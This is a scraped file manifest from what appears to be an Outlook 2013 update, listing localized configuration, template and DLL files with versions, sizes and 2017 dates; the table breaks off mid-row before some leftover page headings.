\nactivity.cfg_1049| activity.cfg| | 977| 13-Sep-17| 05:43 \nactivity.cfg_1087| activity.cfg| | 977| 13-Sep-17| 05:43 \nappt.cfg_1049| appt.cfg| | 783| 13-Sep-17| 05:43 \nappt.cfg_1087| appt.cfg| | 783| 13-Sep-17| 05:43 \ncnfnot.cfg_1049| cnfnot.cfg| | 341| 13-Sep-17| 05:43 \ncnfnot.cfg_1087| cnfnot.cfg| | 341| 13-Sep-17| 05:43 \ncnfres.cfg_1049| cnfres.cfg| | 380| 13-Sep-17| 05:43 \ncnfres.cfg_1087| cnfres.cfg| | 380| 13-Sep-17| 05:43 \ncontact.cfg_1049| contact.cfg| | 788| 13-Sep-17| 05:43 \ncontact.cfg_1087| contact.cfg| | 788| 13-Sep-17| 05:43 \ncurrency.htm_1049| currency.htm| | 625| 13-Sep-17| 05:43 \ncurrency.htm_1087| currency.htm| | 625| 13-Sep-17| 05:43 \ndadshirt.htm_1049| dadshirt.htm| | 560| 13-Sep-17| 05:43 \ndadshirt.htm_1087| dadshirt.htm| | 560| 13-Sep-17| 05:43 \ndistlist.cfg_1049| distlist.cfg| | 821| 13-Sep-17| 05:43 \ndistlist.cfg_1087| distlist.cfg| | 821| 13-Sep-17| 05:43 \ndoc.cfg_1049| doc.cfg| | 783| 13-Sep-17| 05:43 \ndoc.cfg_1087| doc.cfg| | 783| 13-Sep-17| 05:43 \nenvelopr.dll_1049| envelopr.dll| 15.0.4442.1000| 19096| 13-Sep-17| 05:44 \nexitem.cfg_1049| exitem.cfg| | 845| 13-Sep-17| 05:43 \nexitem.cfg_1087| exitem.cfg| | 845| 13-Sep-17| 05:43 \nfaxext.ecf_1049| faxext.ecf| | 832| 13-Sep-17| 05:43 \nfaxext.ecf_1087| faxext.ecf| | 832| 13-Sep-17| 05:43 \ninfomail.cfg_1049| infomail.cfg| | 632| 13-Sep-17| 05:43 \ninfomail.cfg_1087| infomail.cfg| | 632| 13-Sep-17| 05:43 \nipm.cfg_1049| ipm.cfg| | 802| 13-Sep-17| 05:43 \nipm.cfg_1087| ipm.cfg| | 802| 13-Sep-17| 05:43 \njudgesch.htm_1049| judgesch.htm| | 584| 13-Sep-17| 05:43 \njudgesch.htm_1087| judgesch.htm| | 584| 13-Sep-17| 05:43 \njungle.htm_1049| jungle.htm| | 590| 13-Sep-17| 05:43 \njungle.htm_1087| jungle.htm| | 590| 13-Sep-17| 05:43 \nmapir.dll_1049| mapir.dll| 15.0.4875.1000| 1287392| 13-Sep-17| 05:44 \nmsspc.ecf_1049| msspc.ecf| | 782| 13-Sep-17| 05:43 \nmsspc.ecf_1087| msspc.ecf| | 782| 13-Sep-17| 05:43 \nnote.cfg_1049| note.cfg| | 781| 13-Sep-17| 05:43 \nnote.cfg_1087| note.cfg| | 781| 13-Sep-17| 05:43 \nnotebook.htm_1049| notebook.htm| | 570| 13-Sep-17| 05:43 \nnotebook.htm_1087| notebook.htm| | 570| 13-Sep-17| 05:43 \noffisupp.htm_1049| offisupp.htm| | 546| 13-Sep-17| 05:43 \noffisupp.htm_1087| offisupp.htm| | 546| 13-Sep-17| 05:43 \nooftmpl.cfg_1049| ooftmpl.cfg| | 819| 13-Sep-17| 05:43 \nooftmpl.cfg_1087| ooftmpl.cfg| | 819| 13-Sep-17| 05:43 \noutex.ecf_1049| outex.ecf| | 1927| 13-Sep-17| 05:43 \noutex.ecf_1087| outex.ecf| | 1927| 13-Sep-17| 05:43 \noutex2.ecf_1049| outex2.ecf| | 854| 13-Sep-17| 05:43 \noutex2.ecf_1087| outex2.ecf| | 854| 13-Sep-17| 05:43 \noutllibr.dll_1049| outllibr.dll| 15.0.4971.1000| 7964392| 13-Sep-17| 05:44 \noutlperf.ini_1049| outlperf.ini| | 5515| 13-Sep-17| 05:43 \noutlperf.ini_1059| outlperf.ini| | 5515| | \noutlperf.ini_1064| outlperf.ini| | 5515| | \noutlperf.ini_1087| outlperf.ini| | 5515| 13-Sep-17| 05:43 \noutlperf.ini_1088| outlperf.ini| | 5515| | \noutlperf.ini_1090| outlperf.ini| | 5515| | \noutlperf.ini_1092| outlperf.ini| | 5515| | \noutlwvw.dll_1049| outlwvw.dll| 15.0.4442.1000| 127104| 13-Sep-17| 05:44 \npawprint.htm_1049| pawprint.htm| | 553| 13-Sep-17| 05:43 \npawprint.htm_1087| pawprint.htm| | 553| 13-Sep-17| 05:43 \npinelumb.htm_1049| pinelumb.htm| | 566| 13-Sep-17| 05:43 \npinelumb.htm_1087| pinelumb.htm| | 566| 13-Sep-17| 05:43 \npmailext.ecf_1049| pmailext.ecf| | 639| 13-Sep-17| 05:43 \npmailext.ecf_1087| pmailext.ecf| | 639| 13-Sep-17| 05:43 \npost.cfg_1049| post.cfg| | 792| 13-Sep-17| 05:43 \npost.cfg_1087| post.cfg| | 792| 13-Sep-17| 05:43 \npostit.cfg_1049| postit.cfg| | 787| 13-Sep-17| 05:43 \npostit.cfg_1087| postit.cfg| | 787| 13-Sep-17| 05:43 \nrclrpt.cfg_1049| rclrpt.cfg| | 825| 13-Sep-17| 05:43 \nrclrpt.cfg_1087| rclrpt.cfg| | 825| 13-Sep-17| 05:43 \nrecall.cfg_1049| rec.cfg| | 1257| 13-Sep-17| 05:43 \nrecall.cfg_1087| rec.cfg| | 1257| 13-Sep-17| 05:43 \nremote.cfg_1049| remote.cfg| | 799| 13-Sep-17| 05:43 \nremote.cfg_1087| remote.cfg| | 799| 13-Sep-17| 05:43 \nrepltmpl.cfg_1049| repltmpl.cfg| | 812| 13-Sep-17| 05:43 \nrepltmpl.cfg_1087| repltmpl.cfg| | 812| 13-Sep-17| 05:43 \nreport.cfg_1049| report.cfg| | 794| 13-Sep-17| 05:43 \nreport.cfg_1087| report.cfg| | 794| 13-Sep-17| 05:43 \nresend.cfg_1049| resend.cfg| | 806| 13-Sep-17| 05:43 \nresend.cfg_1087| resend.cfg| | 806| 13-Sep-17| 05:43 \nrssitem.cfg_1049| rssitem.cfg| | 800| 13-Sep-17| 05:43 \nrssitem.cfg_1087| rssitem.cfg| | 800| 13-Sep-17| 05:43 \nschdcncl.cfg_1049| schdcncl.cfg| | 811| 13-Sep-17| 05:43 \nschdcncl.cfg_1087| schdcncl.cfg| | 811| 13-Sep-17| 05:43 \nschdreq.cfg_1049| schdreq.cfg| | 1230| 13-Sep-17| 05:43 \nschdreq.cfg_1087| schdreq.cfg| | 1230| 13-Sep-17| 05:43 \nschdresn.cfg_1049| schdresn.cfg| | 837| 13-Sep-17| 05:43 \nschdresn.cfg_1087| schdresn.cfg| | 837| 13-Sep-17| 05:43 \nschdresp.cfg_1049| schdresp.cfg| | 833| 13-Sep-17| 05:43 \nschdresp.cfg_1087| schdresp.cfg| | 833| 13-Sep-17| 05:43 \nschdrest.cfg_1049| schdrest.cfg| | 849| 13-Sep-17| 05:43 \nschdrest.cfg_1087| schdrest.cfg| | 849| 13-Sep-17| 05:43 \nseamarbl.htm_1049| seamarbl.htm| | 586| 13-Sep-17| 05:43 \nseamarbl.htm_1087| seamarbl.htm| | 586| 13-Sep-17| 05:43 \nsecrec.cfg_1049| secrec.cfg| | 681| 13-Sep-17| 05:43 \nsecrec.cfg_1087| secrec.cfg| | 681| 13-Sep-17| 05:43 \nsecure.cfg_1049| secure.cfg| | 647| 13-Sep-17| 05:43 \nsecure.cfg_1087| secure.cfg| | 647| 13-Sep-17| 05:43 \nsharing.cfg_1049| sharing.cfg| | 795| 13-Sep-17| 05:43 \nsharing.cfg_1087| sharing.cfg| | 795| 13-Sep-17| 05:43 \nsign.cfg_1049| sign.cfg| | 666| 13-Sep-17| 05:43 \nsign.cfg_1087| sign.cfg| | 666| 13-Sep-17| 05:43 \nsmimee.cfg_1049| smimee.cfg| | 655| 13-Sep-17| 05:43 \nsmimee.cfg_1087| smimee.cfg| | 655| 13-Sep-17| 05:43 \nsmimes.cfg_1049| smimes.cfg| | 681| 13-Sep-17| 05:43 \nsmimes.cfg_1087| smimes.cfg| | 681| 13-Sep-17| 05:43 \ntask.cfg_1049| task.cfg| | 774| 13-Sep-17| 05:43 \ntask.cfg_1087| task.cfg| | 774| 13-Sep-17| 05:43 \ntaskacc.cfg_1049| taskacc.cfg| | 808| 13-Sep-17| 05:43 \ntaskacc.cfg_1087| taskacc.cfg| | 808| 13-Sep-17| 05:43 \ntaskdec.cfg_1049| taskdec.cfg| | 807| 13-Sep-17| 05:43 \ntaskdec.cfg_1087| taskdec.cfg| | 807| 13-Sep-17| 05:43 \ntaskreq.cfg_1049| taskreq.cfg| | 794| 13-Sep-17| 05:43 \ntaskreq.cfg_1087| taskreq.cfg| | 794| 13-Sep-17| 05:43 \ntaskupd.cfg_1049| taskupd.cfg| | 812| 13-Sep-17| 05:43 \ntaskupd.cfg_1087| taskupd.cfg| | 812| 13-Sep-17| 05:43 \ntechtool.htm_1049| techtool.htm| | 551| 13-Sep-17| 05:43 \ntechtool.htm_1087| techtool.htm| | 551| 13-Sep-17| 05:43 \ndadshirt.htm_1051| dadshirt.htm| | 560| 13-Sep-17| 05:44 \nenvelopr.dll_1051| envelopr.dll| 15.0.4454.1000| 19048| 13-Sep-17| 05:44 \nmapir.dll_1051| mapir.dll| 15.0.4875.1000| 1300192| 13-Sep-17| 05:44 \noutllibr.dll_1051| outllibr.dll| 15.0.4949.1000| 7981800| 13-Sep-17| 05:44 \noutlwvw.dll_1051| outlwvw.dll| 15.0.4420.1017| 127104| 13-Sep-17| 05:44 \ndadshirt.htm_1060| dadshirt.htm| | 560| 13-Sep-17| 05:44 \nenvelopr.dll_1060| envelopr.dll| 1

2018 in Snort Rules

Description

Related